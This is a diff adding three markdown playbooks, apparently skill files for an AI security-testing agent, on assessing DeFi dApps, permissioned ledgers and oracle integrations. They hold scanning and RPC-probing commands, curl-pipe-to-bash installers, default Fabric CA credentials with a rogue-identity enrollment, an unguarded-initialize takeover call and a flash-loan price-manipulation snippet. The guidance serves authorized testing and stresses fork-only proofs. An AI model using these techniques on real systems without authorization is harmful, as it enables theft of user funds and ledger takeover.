+7. Don't trust version strings: a patched-version dependency can still be misused by the wrapper (e.g., GCM with a 64-bit truncated tag). Test behavior, not metadata.
+8. When you find one weak default, sweep for siblings — the same author who shipped a static IV often shipped a hardcoded salt and a `math/rand` keygen nearby.

--- a/strix/skills/web3/defi_dapp.md
+++ b/strix/skills/web3/defi_dapp.md
@@ -1,0 +1,157 @@
+---
+name: defi_dapp
+description: Authorized assessment of DeFi protocols and dApps — on-chain contract logic plus the frontend/wallet integration layer.
+---
+
+# DeFi Protocol / dApp
+
+A DeFi protocol is on-chain logic (smart contracts) plus an off-chain dApp (web frontend, RPC/indexer backends, wallet integration) that users sign transactions against. The attacker's objective is to drain or freeze funds, mint/inflate tokens, manipulate prices or accounting, hijack governance/admin, or trick users into signing malicious transactions. Treat the contract bytecode as the trust boundary: the frontend can lie, but the chain is ground truth. Assess both the on-chain invariants (who can move money, can supply/price be manipulated) and the dApp layer (does the UI/wallet flow let an attacker substitute a hostile target, token, or signature).
+
+## Attack Surface
+
+**On-chain**
+- Public/external state-changing functions: `deposit`, `withdraw`, `swap`, `borrow`, `liquidate`, `flashLoan`, `mint`, `redeem`, `claim`
+- Privileged functions behind `onlyOwner`/roles: `setOracle`, `pause`, `upgradeTo`, `setFee`, `rescueTokens`, `mint`
+- Upgradeability: proxy admin, implementation slot, UUPS `upgradeTo`, timelock, multisig threshold
+- Price/data dependencies: on-chain DEX spot price, Chainlink/Pyth feeds, TWAP windows, `block.timestamp`, `block.number`
+- External calls / token callbacks: ERC777 `tokensReceived`, ERC721 `onERC721Received`, ERC1155, arbitrary `call`/`delegatecall` targets
+- Cross-chain: bridge mint/burn, message verifiers, relayers, replay across chainids
+
+**Off-chain dApp**
+- Frontend JS that builds calldata, contract addresses, and chainId (hardcoded vs. user/host-influenced)
+- Wallet connect flow: `eth_sendTransaction`, `personal_sign`, `eth_signTypedData_v4` (EIP-712), `eth_sign` (blind)
+- Token approvals: `approve(spender, amount)`, `Permit`/`Permit2`, infinite approvals
+- RPC/indexer/API backends, The Graph subgraphs, price APIs, `tokenlist` JSON
+- Source/CI exposure: deployer keys, mnemonics, RPC API keys, verified-vs-deployed bytecode mismatch
+
+## Recon & Enumeration
+
+Install the asset-specific tooling (sandbox already has the generic web tools):
+
+```
+pipx install slither-analyzer mythril crytic-compile     # static analysis + symbolic exec
+pipx install panoramix-decompiler                          # decompile unverified bytecode
+npm i -g @openzeppelin/upgrades-core surya                 # proxy/upgrade + call-graph analysis
+curl -L https://foundry.paradigm.xyz | bash && foundryup   # cast/forge/anvil — forking & PoC
+```
+
+```bash
+# 1. dApp frontend recon — find every contract address, chainId, RPC, and API
+subfinder -d app.target.tld -silent | httpx -silent -title -tech-detect -o live.txt
+katana -u https://app.target.tld -jc -d 3 -o crawl.txt
+ffuf -w main.*.js -u https://app.target.tld/static/js/FUZZ          # source map / bundle hunting
+# pull addresses & secrets out of the JS bundle
+grep -rEoh '0x[a-fA-F0-9]{40}' ./bundle/ | sort -u                   # candidate contract addrs
+trufflehog filesystem ./bundle/ --only-verified
+gitleaks detect --source ./repo --report-format json -o gitleaks.json
+
+# 2. On-chain — pull verified source / bytecode
+cast etherscan-source -d ./src 0xCONTRACT --chain mainnet            # needs ETHERSCAN_API_KEY
+cast code 0xCONTRACT --rpc-url $RPC                                   # raw bytecode if unverified
+panoramix 0xCONTRACT                                                  # decompile if no source
+
+# 3. Proxy / admin / upgrade posture
+cast storage 0xCONTRACT 0x360894a13ba1a3210667c828492db98dca3e2076cc3735a920a3ca505d382bbc --rpc-url $RPC  # EIP-1967 impl slot
+cast storage 0xCONTRACT 0xb53127684a568b3173ae13b9f8a6016e243e63b6e8ee1178d6a717850b5d6103 --rpc-url $RPC  # EIP-1967 admin slot
+cast call 0xCONTRACT "owner()(address)" --rpc-url $RPC
+
+# 4. Static analysis of the contracts
+slither ./src --checklist --markdown-root . > slither.md
+slither ./src --print human-summary,modifiers,function-summary
+myth analyze ./src/Vault.sol --solv 0.8.20 -t 3                       # symbolic; tune depth -t
+surya graph ./src/*.sol | dot -Tpng > callgraph.png
+
+# 5. dApp backend / API layer
+nuclei -u https://api.target.tld -as -s critical,high -rl 40 -j -o nuclei.jsonl
+nuclei -u https://app.target.tld -t http/exposures/ -tags graphql,swagger -silent
+semgrep --config p/smart-contracts --config p/javascript ./repo
+```
+
+## Methodology
+
+1. **Map the system.** Enumerate every contract address from the frontend bundle and on-chain. Diff verified source against deployed bytecode (`cast code` vs Etherscan) — an unverified or mismatched implementation is itself a finding. Build the call graph with `surya`/`slither`.
+2. **Establish the trust model.** Who is `owner`/admin? Is it an EOA, a multisig (read threshold), or a timelock? Can admin `upgradeTo`, `mint`, `pause`, or `rescueTokens` arbitrarily? Single-EOA control of upgrade = rug/compromise risk.
+3. **Identify value flows.** For each money-moving function, write the intended invariant (e.g. `totalSupply == sum(balances)`, `assets >= shares * pricePerShare`). These invariants are your test oracle.
+4. **Hunt the classic on-chain bugs** (see Key Weaknesses) against each external function, prioritizing functions that move funds or read prices.
+5. **Fork mainnet and reproduce.** Use `anvil --fork-url $RPC --fork-block-number N` and write a `forge` test that executes the candidate exploit against real state. This is how you turn a static finding into a confirmed one.
+6. **Audit the dApp/wallet layer.** Can the contract address, chainId, token, or spender be influenced by the page/host/query? Does the UI request blind `eth_sign`, infinite approvals, or opaque EIP-712 structs?
+7. **Assess oracle/price dependencies.** Is any price derived from manipulable on-chain spot (single-block DEX reserves) vs. a TWAP or external feed? Flash-loan price manipulation is the dominant DeFi loss vector.
+8. **Validate, scope impact, chain, and report** with a reproducible forked PoC.
+
+## Key Weaknesses / Techniques
+
+### Reentrancy (single-function, cross-function, read-only)
+State updated *after* an external call/transfer. Look for `.call{value:}`, ERC777/ERC721 callbacks, and any external call before balance bookkeeping.
+- Detect: `slither ./src --detect reentrancy-eth,reentrancy-no-eth,reentrancy-benign`
+- Read-only reentrancy: a `view` price/`getReserves` read during a callback returns stale state; downstream integrators consume it.
+- PoC pattern (forge): malicious receiver re-enters `withdraw()` from its `receive()`/`tokensReceived()` and drains before balance decrements.
+
+### Oracle / price manipulation
+Pricing off `getReserves()`/spot or a too-short TWAP. Flash-loan to skew the pool, transact at the skewed price, repay.
+```
+# fork and skew a Uniswap pair, then call the victim's price-dependent fn
+cast call 0xPAIR "getReserves()(uint112,uint112,uint32)" --rpc-url http://127.0.0.1:8545
+```
+Confirm with a forge test: flashloan -> swap -> victim borrow/mint at bad price -> close.
+
+### Access control / privilege gaps
+Missing or wrong modifier on a sensitive function: unguarded `initialize()` (uninitialized proxy), `mint`, `setOracle`, `upgradeTo`, `delegatecall` to attacker target.
+- `slither ./src --detect unprotected-upgrade,suicidal,arbitrary-send-eth,controlled-delegatecall`
+- Test calling each admin/init function from an unprivileged key on a fork: `cast send 0xC "initialize(address)" $ME --private-key $ATTACKER`.
+
+### Arithmetic & accounting
+First-depositor share inflation (ERC4626 donation attack), rounding that favors the caller, fee-on-transfer/rebasing tokens breaking `balanceBefore/After`, unchecked math in older Solidity, precision loss in `mulDiv`.
+
+### Unchecked external calls / token assumptions
+Ignored return value of `transfer`/`transferFrom` (USDT-style no-bool), assuming `transferFrom` pulls exact amount (deflationary tokens), or accepting arbitrary token addresses into a swap/router path.
+
+### Signature & approval abuse (dApp + on-chain)
+- EIP-2612 `permit`/`Permit2` with missing deadline or nonce reuse; signatures replayable across chainids if `DOMAIN_SEPARATOR` omits `chainid`.
+- Frontend requesting `eth_sign` (blind hash) or `eth_signTypedData` for an opaque `spender`/`amount` — verify against `jwt_tool`-style decode; here decode the EIP-712 struct and confirm it matches what the UI claims.
+- Infinite `approve(spender, 2**256-1)` to a contract the user never audited.
+
+### dApp frontend integrity
+- Contract address / chainId taken from a mutable source (query param, localStorage, host header, third-party tokenlist) — attacker substitutes a hostile contract.
+- XSS/dependency compromise in the bundle that rewrites `to`/`data` of the pending transaction before signing (drainer pattern). Check CSP, SRI on the wallet-connect bundle.
+- Verify with `nuclei -t http/exposures/configs/ -tags exposure` and a manual review of how calldata is assembled.
+
+### Upgradeability & storage collisions
+Proxy/implementation storage layout mismatch after upgrade, unprotected `upgradeTo` (UUPS), or a self-destructible implementation.
+- `npx @openzeppelin/upgrades-core validate` / `slither-check-upgradeability`.
+
+## Validation
+
+1. **Fork the live chain** at a recent block: `anvil --fork-url $RPC --fork-block-number $N`.
+2. **Write a `forge` PoC test** that starts from real on-chain state, executes the exploit, and asserts the broken invariant (attacker balance increased / victim balance drained / supply inflated).
+3. Quantify: report the value extractable in one transaction/block and whether it is flash-loan-funded (no attacker capital required = higher severity).
+4. For dApp/signature findings, demonstrate the malicious transaction the user would actually sign (decoded `to`/`value`/`data` or EIP-712 struct) and how the UI hides or misrepresents it.
+5. Re-run the PoC against a second fork block to prove it is not state-specific. Never execute against mainnet with real funds — keep all PoCs on the local fork.
+
+## False Positives
+
+- Slither/Mythril "reentrancy" on functions guarded by `nonReentrant` or following checks-effects-interactions — read the modifier before reporting.
+- "Arbitrary send" / "unprotected" flags on functions that are intentionally permissionless (e.g. public `claim` to `msg.sender`).
+- Spot-price "manipulation" where the value is only displayed in the UI and never used for an on-chain financial decision.
+- Admin "centralization" that is actually a multisig + timelock with reasonable threshold — note it as risk, not a critical exploit.
+- Infinite approval to a *protocol's own* immutable, audited router (common UX) vs. an arbitrary/upgradeable spender.
+- Decompiler artifacts on unverified contracts — confirm against bytecode behavior on a fork, not Panoramix guesses alone.
+
+## Chaining & Impact
+
+- Unguarded `initialize()` on a proxy → become owner → `upgradeTo(malicious)` → drain every deposit.
+- Flash loan → oracle/spot manipulation → over-borrow or mint at bad price → repay loan, keep difference → protocol insolvency.
+- Read-only reentrancy → poison a `view` price → an *integrating* protocol liquidates/prices wrong → losses one hop away from the original bug.
+- Leaked deployer key/mnemonic from CI/bundle (`trufflehog`/`gitleaks`) → direct admin actions, no contract bug needed.
+- Frontend XSS / compromised dependency → wallet drainer: rewrite pending tx target → mass user fund theft without touching the contracts.
+- Signature replay across chains/forks → reuse a `permit` or governance vote on a sibling deployment.
+
+## Pro Tips
+
+1. Always diff deployed bytecode against verified source — `cast code` vs Etherscan. The audited code is not always what is running.
+2. Read the access-control graph first; most catastrophic DeFi losses are an admin/upgrade/init gap, not exotic math.
+3. The single highest-yield class is flash-loan price manipulation — for every price read, ask "can one transaction move this number?"
+4. Don't trust a `view` function: read-only reentrancy makes "safe" getters lie mid-callback.
+5. Test the dApp by intercepting the wallet RPC (`eth_sendTransaction`) and inspecting the real decoded calldata — the UI's summary is often wrong or omits the dangerous param.
+6. Fork at the exact block of a suspected historical incident to learn the codebase's failure modes, then check whether the fix is complete.
+7. Treat fee-on-transfer, rebasing, and ERC777 tokens as adversarial inputs — they break naive `balanceOf` accounting and enable reentrancy.
+8. Keep every PoC on a local `anvil` fork; quantify loss in USD at fork-block prices so severity is unambiguous.

--- a/strix/skills/web3/dlt.md
+++ b/strix/skills/web3/dlt.md
@@ -1,0 +1,155 @@
+---
+name: dlt
+description: Assessing permissioned distributed-ledger platforms — consensus, membership/identity, and the smart-contract execution layer.
+---
+
+# DLT (Permissioned Distributed Ledger)
+
+A DLT identifier points at a permissioned ledger deployment — Hyperledger Fabric, R3 Corda, Quorum/GoQuorum, Hyperledger Besu (IBFT/QBFT), or ConsenSys-style consortium chains — where a known set of organizations run nodes, an MSP/CA controls who may transact, and ordering/consensus is BFT or crash-tolerant rather than open proof-of-work. Unlike a public chain, trust is concentrated in identity infrastructure and node operators. The attacker's objective is to subvert one of three layers: **consensus/ordering** (forge or reorder blocks, halt the network), **membership/identity** (mint or steal a valid identity, escalate org roles), or the **contract layer** (chaincode/CorDapp/smart-contract logic that moves assets or exposes private data). Compromising any one frequently yields read access to "private" ledger state or the ability to commit fraudulent transactions that all nodes accept as canonical.
+
+## Attack Surface
+
+**Node & peer RPC/APIs**
+- Fabric: peer (`7051` gossip/endorsement), orderer (`7050`), CA (`7054`), operations/metrics (`9443`, `9444`)
+- Besu/Quorum: JSON-RPC HTTP `8545`, WS `8546`, GraphQL `8547`, P2P/devp2p `30303`, Raft `50400`, privacy manager Tessera/Orion (`9101`, `9081`)
+- Corda: P2P AMQP `10002`, RPC `10003`, node shell SSH, network-map and doorman HTTP services
+
+**Identity / membership**
+- Fabric CA enrollment/registration REST (`/enroll`, `/register`, `/reenroll`, `/revoke`), MSP cert stores, `connection.json` / wallet files
+- Corda doorman/CSR signing endpoints, network parameters file
+- TLS client certs, admincerts, and signing keys often shipped in repos or container images
+
+**Contract / app layer**
+- Fabric chaincode (Go/Node/Java) invoked via gateway SDK; CC2CC calls; private data collections (PDC)
+- Quorum/Besu EVM contracts (often Solidity) plus `eth_*`/`priv_*` privacy methods
+- CorDapp flows, contract `verify()` constraints, oracle services
+- Off-chain gateways, REST wrappers, explorer UIs (Hyperledger Explorer, Blockscout, Cakeshop)
+
+**Operational glue**
+- CouchDB state DB (Fabric, `5984`), LevelDB; Kafka/Raft for ordering
+- Config management: genesis block, `configtx.yaml`, channel config, network parameters
+- CI/CD that signs and packages chaincode
+
+## Recon & Enumeration
+
+```bash
+# Port + service sweep across consortium hosts (in scope)
+naabu -host <node> -p 7050,7051,7054,8545,8546,8547,9443,10002,10003,30303,5984,50400 -o ports.txt
+nmap -sV -sC -p- --open <node> -oA dlt_node
+
+# Web/API surface of explorers, REST gateways, CA
+httpx -l hosts.txt -ports 7054,8545,8547,9443,5984,8080,3000 -title -tech-detect -status-code -o http.txt
+nuclei -l http.txt -tags exposure,misconfig,blockchain,ethereum -s critical,high,medium -j -o nuclei.jsonl
+
+# EVM JSON-RPC fingerprint + method exposure (Quorum/Besu)
+curl -s -X POST http://<node>:8545 -H 'content-type:application/json' \
+  -d '{"jsonrpc":"2.0","method":"web3_clientVersion","params":[],"id":1}'
+for m in admin_peers admin_nodeInfo txpool_content debug_traceTransaction \
+         personal_listAccounts miner_start eth_accounts net_version clique_getSigners \
+         istanbul_getValidators priv_getPrivateTransaction; do
+  curl -s -X POST http://<node>:8545 -H 'content-type:application/json' \
+    -d "{\"jsonrpc\":\"2.0\",\"method\":\"$m\",\"params\":[],\"id\":1}"; echo " <= $m"
+done
+
+# Fabric CA: probe enrollment surface + cert info
+curl -sk https://<ca>:7054/cainfo | jq .
+curl -sk https://<ca>:7054/api/v1/cainfo | jq .
+
+# CouchDB state DB exposure (Fabric)
+curl -s http://<node>:5984/_all_dbs
+curl -s http://<node>:5984/_utils/   # Fauxton UI
+
+# Operations/metrics + health (often unauthenticated)
+curl -s http://<node>:9443/metrics | head; curl -s http://<node>:9443/healthz
+
+# Directory/asset discovery on gateways and explorers
+ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://<gw>/FUZZ -mc 200,401,403
+katana -u http://<explorer> -d 3 -jc -o explorer_endpoints.txt
+
+# Secrets in any pulled artifacts (repos, images, wallets, connection profiles)
+trufflehog filesystem ./artifacts --only-verified
+gitleaks detect -s ./repo -v
+grep -rEl 'BEGIN (EC |RSA )?PRIVATE KEY|adminCerts|signcerts|"private_key"' ./artifacts
+
+# Container image audit (node/CA/chaincode images)
+trivy image <registry>/fabric-peer:<tag>
+syft <registry>/quorum:<tag> -o table   # if asset-specific SBOM needed: install via curl -sSfL https://get.anchore.io/syft | sh
+
+# Smart-contract / chaincode static analysis
+# Solidity (Quorum/Besu): pip install slither-analyzer; pip install mythril (or docker)
+slither contracts/ --json slither.json
+myth analyze contracts/Vault.sol
+# Go/Node/Java chaincode + CorDapps:
+semgrep --config p/owasp-top-ten --config p/secrets chaincode/
+```
+
+Asset-specific tooling worth installing: `slither`/`mythril` for EVM contracts, `web3.py`/`ethereum-input-decoder` for RPC interaction, the Fabric `peer`/`fabric-ca-client` binaries for channel and identity probing, `corda-tools` shell, `jwt_tool` for any gateway JWTs, and `interactsh-client` for blind callbacks from oracle/webhook flows.
+
+## Methodology
+
+1. **Map the topology.** Identify ledger flavor (Fabric vs Quorum/Besu vs Corda) from ports, `web3_clientVersion`, CA banners, and any explorer. Enumerate orgs, peers, orderers/validators, and the consensus type (Raft/Kafka, IBFT/QBFT/Clique, BFT-SMaRt, Notary).
+2. **Inventory exposed control planes.** For each node, determine which admin/privileged RPC namespaces (`admin_`, `personal_`, `miner_`, `debug_`, `txpool_`, `clique_`/`istanbul_`, `priv_`) or operations endpoints answer without auth. These are the highest-value misconfigs.
+3. **Probe membership/identity.** Test whether the CA/doorman will enroll or register an identity with weak/default bootstrap credentials, whether CSRs are signed without approval, and whether wallet/MSP material leaked into images, repos, or backups.
+4. **Assess channel/network config.** Pull channel config (`configtxlator`) or network parameters; review endorsement policies, admin policies, ACLs, and which orgs can sign config updates. A single-org admin policy is a takeover primitive.
+5. **Audit the contract layer.** Statically analyze chaincode/CorDapp/Solidity for access-control gaps, missing endorsement enforcement, integer/decimal handling, phantom reads in PDC, and unchecked external calls. Then dynamically invoke from a low-privilege identity.
+6. **Test private-data confidentiality.** Verify that "private" collections, `priv_` transactions (Tessera/Orion), and Corda need-to-know flows actually withhold data from non-party nodes.
+7. **Assess consensus resilience.** Without disrupting production, reason about validator-set governance, quorum thresholds, and whether one compromised org/validator can halt ordering or, in Raft/Clique, gain disproportionate control.
+8. **Chain and prove impact.** Convert a leaked identity or open RPC into a committed fraudulent transaction, an unauthorized state read, or a documented denial-of-service path — then stop at a benign PoC.
+
+## Key Weaknesses / Techniques
+
+- **Unauthenticated/over-exposed admin RPC.** `personal_*` and `miner_*`, or `clique_propose`/`istanbul_propose` reachable without auth lets an attacker unlock accounts, send transactions, or vote validators in/out. Validate:
+  ```bash
+  curl -s -X POST http://<node>:8545 -H 'content-type:application/json' \
+    -d '{"jsonrpc":"2.0","method":"clique_getSigners","params":["latest"],"id":1}'
+  # If clique_propose/istanbul_propose is open, a malicious org can add itself as a validator.
+  ```
+- **`debug_`/`txpool_` information disclosure.** `debug_traceTransaction`, `debug_storageRangeAt`, and `txpool_content` leak pending private transactions, storage slots, and counterparties — breaking the confidentiality that justified using a permissioned chain.
+- **Weak CA bootstrap / open enrollment.** Default `admin:adminpw` on Fabric CA, or a doorman that auto-signs CSRs, lets you mint a fully valid org identity:
+  ```bash
+  fabric-ca-client enroll -u https://admin:adminpw@<ca>:7054 --tls.certfiles ca.pem
+  fabric-ca-client register --id.name rogue --id.secret pw --id.type client
+  ```
+- **Leaked MSP/wallet/keys.** `signcerts`, `keystore` private keys, `connection.json`, or `*.id` wallet files committed to repos or baked into images grant the holder that identity's full transaction rights. Hunt with `trufflehog`/`gitleaks` and inspect container layers.
+- **Permissive endorsement / admin policies.** Endorsement policy `OR('Org1.member')` or channel admin policy satisfiable by one org means a single compromised peer can endorse and commit arbitrary state, or rewrite channel config (ACLs, MSPs).
+- **Chaincode/contract access-control gaps.** Missing caller checks (`cid.GetID()` / `GetMSPID()` not enforced; Solidity functions lacking `onlyRole`/`require(msg.sender==…)`) allow privilege escalation or unauthorized asset transfer. Flagged by `slither`'s `arbitrary-send`, `unprotected-upgrade`, `tx-origin`, and missing-modifier detectors.
+- **Private-data leakage.** PDC defined without proper `memberOnlyRead`/`memberOnlyWrite`, or `priv_` transactions where the payload is reconstructable via `debug_` or an over-broad Tessera peer list.
+- **CouchDB rich-query injection / exposure.** Selector queries built from unsanitized input (`getQueryResult`) allow phantom reads and unindexed selector abuse; an open CouchDB port exposes raw world state and admin Fauxton.
+- **Replay / nonce & chainID handling.** Pre-EIP-155 Quorum configs or contracts without nonce binding allow cross-chain or in-chain transaction replay.
+- **Consensus governance flaws.** Clique/IBFT validator addition by simple majority of a small set, or Raft leader concentration on one operator, makes a single-org compromise a network-control event.
+
+## Validation
+
+- Confirm an exposed RPC is *actionable*, not just present: read a non-public datum (e.g., `debug_storageRangeAt` returning a private slot, or `txpool_content` showing a counterparty) and capture the raw JSON response.
+- For identity flaws, enroll a benign test identity and use it to **read** ledger state you should not see, or submit a clearly-labeled no-op/test-namespace transaction that nodes accept — never touch production asset balances.
+- For chaincode/contract bugs, write a minimal PoC invocation from a low-privilege identity that triggers the unauthorized path on a test channel/contract; record the resulting state delta and the endorsing peers.
+- For private-data leakage, demonstrate that a node *not* in the collection/party set can reconstruct the data, with the request and response side by side.
+- Capture validator set, channel/network config hash, block height, and tx ID for every finding so it is reproducible and time-anchored.
+
+## False Positives
+
+- Admin RPC methods that respond but are bound to localhost only, or gated behind mTLS the tester is actually presenting — reachability from the in-scope network must be proven.
+- `eth_accounts`/`personal_listAccounts` returning empty is informational, not a key-exposure finding.
+- CA enrollment that succeeds with credentials *you were provisioned* — that is intended, not a break.
+- `slither`/`mythril` reentrancy or `tx.origin` hits on view-only or owner-gated functions, or on contracts not actually deployed on the in-scope network.
+- "Exposed" CouchDB/metrics ports that are inside an isolated overlay network unreachable from any attacker-controlled position.
+- Pending transactions visible in `txpool_content` that are already public by design (e.g., non-private value transfers on a fully-shared channel).
+
+## Chaining & Impact
+
+- Leaked/minted identity → submit endorsed transaction satisfying a weak endorsement policy → **fraudulent asset transfer or state forgery** accepted by all peers.
+- Open CA/doorman → mint org-admin identity → push a channel/network config update (add MSP, relax ACLs) → **persistent consortium-level control**.
+- `debug_`/`priv_`/Tessera exposure → reconstruct private transactions → **confidentiality breach** of supposedly need-to-know data, plus counterparty intelligence.
+- `clique_propose`/`istanbul_propose` access → vote in a controlled validator → reach quorum influence → **block-production control or selective censorship**.
+- Chaincode RCE/SSRF (chaincode calling external services with attacker input) → pivot from the contract sandbox to the peer host or internal network; combine with leaked TLS certs for lateral movement.
+- Ordering-service DoS (overwhelm Raft leader / exploit a panic in chaincode) → **ledger halt**, denying all member transactions.
+
+## Pro Tips
+
+- Fingerprint flavor first; the entire playbook forks on Fabric vs EVM-permissioned vs Corda. `web3_clientVersion` + CA banner + port shape settle it in seconds.
+- The richest findings are usually *operational*, not cryptographic: an open `debug_`/`personal_` namespace or a leaked `keystore` beats hunting for a BFT break.
+- Always pull and diff channel/network config — endorsement and admin policies are where "permissioned" silently becomes "single-org-controlled."
+- Treat private-data collections and `priv_` transactions as suspect by default; vendors frequently leak the payload through trace/debug methods or an over-broad privacy-peer list.
+- Decode raw transactions before reporting impact — an "unauthorized write" that the contract would have reverted is noise; confirm the state delta committed.
+- For consensus claims, reason from the validator/quorum *governance* model (who can add/remove signers) rather than attempting live disruption against production.
+- Keep all PoC transactions in a dedicated test namespace/channel with obviously benign payloads, and record block height + tx ID so the operator can verify and roll back.

--- a/strix/skills/web3/oracle_integration.md
+++ b/strix/skills/web3/oracle_integration.md
@@ -1,0 +1,147 @@
+---
+name: oracle_integration
+description: Assessing on-chain oracle integrations for price-feed manipulation, staleness, and source-trust failures.
+---
+
+# Oracle Integration
+
+An oracle integration is the code path by which a smart contract imports off-chain or cross-contract data — most commonly an asset price — and acts on it (mint, borrow, liquidate, settle, rebase). The attacker's objective is to make the consuming contract accept a value that does not reflect honest market reality: a spot price snapshot bent by a flash loan, a frozen feed that the contract still trusts, a reference the attacker can write to, or a decimals/sign mismatch that turns a sane number into a catastrophic one. Because the oracle is the contract's source of truth about value, a single bad read frequently converts directly into drained collateral.
+
+## Attack Surface
+
+**Read sites (where the contract pulls a value)**
+- Chainlink-style aggregators: `latestRoundData()`, `latestAnswer()`, `decimals()`, `description()`
+- DEX-derived prices: Uniswap V2 `getReserves()`, V3 `slot0()` (instant tick), V3 `observe()` (TWAP)
+- LP / vault share prices: `getVirtualPrice()`, `pricePerShare()`, `convertToAssets()`, `totalSupply()`/`balanceOf` ratios
+- Custom keeper/pusher contracts and signed-price endpoints (Pyth `updatePriceFeeds`, Redstone calldata-injected prices)
+- Cross-chain bridges / L2 sequencer uptime feeds
+
+**What is exposed / influenceable**
+- The numerator: spot reserves, slot0 tick, share ratios — all mutable inside one transaction via swaps/deposits
+- The trust boundary: which address is allowed to push prices, who owns the aggregator/proxy, upgradeable proxies behind the feed
+- The freshness contract: `updatedAt`, `answeredInRound`, heartbeat assumptions, deviation thresholds
+- The math glue: `decimals()` scaling, signed `int256` answers, division order, fixed-point rounding
+
+## Recon & Enumeration
+
+Most work is source/bytecode review plus a forked-chain harness. Install the EVM tooling:
+
+```bash
+pip install slither-analyzer mythril            # static analysis + symbolic
+curl -L https://foundry.paradigm.xyz | bash && foundryup   # forge/cast/anvil
+npm i -g @openzeppelin/contracts                # reference interfaces for diffing
+```
+
+Pull and inventory the target contracts (verified source where available):
+
+```bash
+# fetch verified source by address from an explorer (Etherscan-compatible)
+cast etherscan-source --chain <chain> -d ./src <CONTRACT_ADDR>
+# enumerate every oracle touchpoint
+grep -rniE 'latestRoundData|latestAnswer|getReserves|slot0|observe|getVirtualPrice|pricePerShare|convertToAssets|getPrice' ./src
+```
+
+Static and secret sweeps:
+
+```bash
+slither ./src --print human-summary
+slither ./src --detect unused-return,divide-before-multiply,incorrect-equality
+semgrep --config p/smart-contracts ./src
+trufflehog filesystem ./src --only-verified     # leaked keeper/deployer keys
+gitleaks dir ./src
+```
+
+Live feed enumeration with `cast` against a fork or archive RPC:
+
+```bash
+anvil --fork-url $RPC_URL --fork-block-number <N> &   # deterministic harness
+cast call <FEED> "latestRoundData()(uint80,int256,uint256,uint256,uint80)" --rpc-url $RPC_URL
+cast call <FEED> "decimals()(uint8)" --rpc-url $RPC_URL
+cast call <FEED> "aggregator()(address)" --rpc-url $RPC_URL   # proxy -> underlying
+cast call <FEED> "owner()(address)" --rpc-url $RPC_URL        # who controls the source
+```
+
+For DEX-sourced prices, read the pool the contract trusts and confirm whether it is the canonical, deep pool or a thin one:
+
+```bash
+cast call <PAIR> "getReserves()(uint112,uint112,uint32)" --rpc-url $RPC_URL
+cast call <V3POOL> "slot0()(uint160,int24,uint16,uint16,uint16,uint8,bool)" --rpc-url $RPC_URL
+cast call <V3POOL> "liquidity()(uint128)" --rpc-url $RPC_URL   # thin pool = cheap to move
+```
+
+## Methodology
+
+1. **Map every price read.** From the grep above, list each call site and trace the returned value to the action it gates (LTV, mint amount, liquidation trigger, settlement payout). Note the units and decimals expected at each hop.
+2. **Classify each source.** Push oracle (Chainlink/Pyth), spot DEX (`getReserves`/`slot0`), TWAP (`observe`), or derived share price. Spot and derived are manipulable within a transaction; push oracles shift the trust to the publisher and freshness checks.
+3. **Audit the trust boundary.** Resolve proxy → aggregator → owner. Determine if a single EOA/multisig can push arbitrary answers, and whether the feed proxy is upgradeable.
+4. **Audit freshness handling.** Confirm the contract checks `updatedAt` against a heartbeat, validates `answeredInRound >= roundId`, and rejects non-positive answers. Missing checks mean a stale or zero price is consumed.
+5. **Audit the math.** Verify `decimals()` is read dynamically (not hardcoded), that `int256` answers are guarded against ≤0, division happens after multiplication, and cross-feed combinations normalize units.
+6. **Build a fork PoC.** On `anvil --fork-url`, simulate a flash loan, move the trusted pool, call the victim action in the same transaction, and measure the value extracted vs. capital used.
+7. **Quantify cost-to-move.** Compute the swap size needed to shift the trusted source past the contract's deviation tolerance, and compare to attacker profit.
+
+## Key Weaknesses / Techniques
+
+**Spot-price (single-block) manipulation.** The contract prices collateral from `getReserves()` or `slot0()` — both reflect the instantaneous state and can be flash-loan-bent inside one transaction. Validate with a forge test that flash-borrows, swaps to skew the pool, then calls the victim's borrow/mint:
+
+```solidity
+// inside a forge fork test
+uint256 borrowed = pool.flashLoan(address(token), 50_000e18);
+router.swapExactTokensForTokens(borrowed, 0, path, address(this), block.timestamp);
+victim.depositAndBorrow(collateralAmt);   // prices collateral off the now-skewed pool
+// repay flash loan, keep the delta
+```
+
+**Missing staleness / heartbeat check.** Code uses `(, int256 p,,,) = feed.latestRoundData();` and ignores `updatedAt`. If the feed stops updating (publisher outage, deprecated feed), the last price is consumed indefinitely. Confirm by reading the live `updatedAt` and comparing to `block.timestamp - heartbeat`:
+
+```bash
+cast call <FEED> "latestRoundData()(uint80,int256,uint256,uint256,uint80)" --rpc-url $RPC_URL
+# if block.timestamp - updatedAt > heartbeat and contract has no guard -> stale read accepted
+```
+
+**Unchecked negative / zero answer.** `int256` answers can be `0` or negative on misconfiguration; if cast to `uint256` without a `require(p > 0)`, the price collapses to zero (free collateral) or wraps huge. Grep for casts of `latestAnswer`/`latestRoundData` results without a positivity guard.
+
+**Round-completeness bypass.** Missing `require(answeredInRound >= roundId)` lets a not-yet-finalized or carried-over round price through.
+
+**Decimals / scaling mismatch.** Hardcoding `1e8` when the feed reports a different `decimals()`, or mixing an 18-decimal token with an 8-decimal feed, mis-scales value by orders of magnitude. Re-derive the expected scale from the live `decimals()` call and compare to the constant in source.
+
+**Manipulable derived price.** `getVirtualPrice()` / `pricePerShare()` / `convertToAssets()` can be inflated by a donation or first-deposit share-inflation attack, or read mid-reentrancy when the pool's invariant is temporarily false (read-only reentrancy). Check whether the consumer reads share price during a callback window.
+
+**Untrusted / writable source.** The "oracle" is a custom contract whose setter (`setPrice`, `pushReport`) lacks access control or trusts an EOA the attacker can become, or a Pyth/Redstone update where the contract fails to verify the signed payload's feed id, publish time, or confidence interval.
+
+**Single-source dependency.** No median across sources and no sanity bound (min/max bands), so any one compromised or thin feed dictates the value.
+
+## Validation
+
+- Reproduce on a pinned fork (`anvil --fork-block-number`) so the PoC is deterministic, then re-run to confirm stability.
+- For manipulation: produce a single-transaction forge test that starts and ends with the attacker's capital (flash loan repaid) and shows net token outflow from the victim. Log balances before/after with `console.log`.
+- For staleness: show the live feed's `updatedAt` exceeds the heartbeat window while the contract still returns the action as valid — call the gated function on the fork and confirm it does not revert.
+- For decimals/sign bugs: drive the feed (via storage overwrite with `cast rpc anvil_setStorageAt` or a mock) to a boundary value and show the consumer mis-scales or accepts ≤0.
+- Quantify impact in concrete numbers: capital required, profit extracted, and which protocol invariant (solvency, LTV, peg) is broken.
+
+## False Positives
+
